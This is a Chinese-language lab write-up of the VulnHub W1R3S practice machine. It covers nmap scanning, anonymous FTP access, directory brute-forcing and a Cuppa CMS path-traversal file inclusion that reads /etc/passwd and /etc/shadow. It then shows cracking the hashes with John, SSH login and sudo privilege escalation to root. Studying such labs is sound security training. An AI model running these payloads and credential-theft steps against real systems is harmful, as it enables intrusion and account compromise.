靶机实操—W1R3S—学习笔记

靶机实操—W1R3S—学习笔记

在这里插入图片描述

靶机下载地址:链接: https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip
在这里插入图片描述

1、主机发现

在渗透测试开始之前,可以通过 nmap 扫描一遍,看一下哪些主机在线,开启靶机后再扫描一遍,通过比对得出哪台机器是渗透目标。

ip a				# 查看IP
nmap -sn 网段/24		# 扫描在线主机

查看IP
主机扫描

2、NMAP端口扫描及思路

在端口扫描时要注意两点:

  1. 全(所有端口不应该有遗漏)
  2. 准(扫描出的端口都开了哪些服务)
nmap --min-rate 10000 -p- 靶机IP		# min-rate 最小速度  p 端口  -p- 所有端口

端口扫描
建议端口扫描至少两遍,之后针对扫描出的端口进行重点扫描

nmap -sT -sV -O -p 端口号 靶机IP		# sT 用TCP协议扫描  sV 对扫描出的版本进行判断  O 对操作系统进行判断
nmap -sU -p 端口号 靶机IP			# sU 用UDP协议

TCP、版本、操作系统扫描
UDP扫描
nmap漏洞脚本扫描,能够将一些特别容易的漏洞扫出来

nmap --script=vuln -p 端口号 IP

漏洞扫描
wordpress是一个用得较多的内容管理系统,后面渗透时可以重点关注一下。

3、FTP渗透

ftp 靶机IP

尝试 ftp 能否匿名登录
ftp 匿名登录:用户:anonymous,密码一般为空
FTP匿名登录
能进入后,使用binary命令,防止通过 ftp 下载时可执行文件损坏,查看里面的文件,通过 mget 拿下所有文件
下载文件
下载文件
下载文件
然后查看下载的文件,并保存至笔记
查看
01.txt
02.txt
03.txt
employee-names.txt
worktod.txt
分析文本内容,如02.txt文本存在加密内容,可以使用命令识别最可能的加密方式,再寻找使用对应工具解密

hash-identifier '加密内容'

MD5
解密
也有可能不是加密方式而是编码方式,可以使用对应命令尝试解密,本次编码方式为 base64

echo '编码内容' | base64 -d		# d 表示解码

base64
如果文本里存在上下左右颠倒的内容,可以使用网络工具还原,链接: https://www.upsidedowntext.com/
在这里插入图片描述
在这里插入图片描述

4、Web目录爆破

21端口的 ftp 服务内容已经看完,接下来查看80端口的 http 服务,使用浏览器访问IP地址
在这里插入图片描述
常用目录爆破工具:gobuster dirb feroxbuster

sudo feroxbuster -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt		# u URL W 指定字典

目录爆破

5、Web渗透,本地文件包含利用

分析结果,打开wordpress,将localhost修改为靶机IP,如果没有东西,再去看administrator
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在渗透时要认真测试,但也要及时出来,不要死磕
在前面访问时,发现该网站的CMS(内容管理系统)为Cuppa,因此使用searchsploit搜索是否存在漏洞,如果存在则将其导出

searchsploit cuppa cms
searchsploit cuppa cms -m 25971		# 下载

在这里插入图片描述
查看漏洞详情
在这里插入图片描述
查看漏洞详情
在这里插入图片描述
在这里插入图片描述
浏览器访问链接:http://192.168.22.128/administrator/alerts/alertConfigField.php?urlConfig=…/…/…/…/…/…/…/…/…/etc/passwd
在这里插入图片描述
利用漏洞

sudo curl --data-urlencode 参数 路径

在这里插入图片描述
在拿到/etc/passwd后尝试获取/etc/shadow
在这里插入图片描述
在这里插入图片描述

6、John破解

新建一个hash文件,将可能的密码放入其中,尝试破解
在这里插入图片描述

john hash		# john命令不能再次解密同一个文件,需再解密,执行命令rm -r /root/.john/john.pot删除john.pot文件

在这里插入图片描述

7、获得初级权限和立足点

使用ssh命令登录W1R3S用户

ssh 主机名@IP

在这里插入图片描述
查看状态

whoami		# 是谁
uname -a		# 系统状态

在这里插入图片描述

8、sudo提权

查看当前用户的权限

sudo -l				# 列出目前的权限
sudo /bin/bash		# 赋予 root 权限

在这里插入图片描述
在这里插入图片描述
获取/root目录下的flag.txt

cd /root
cat flag.txt

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值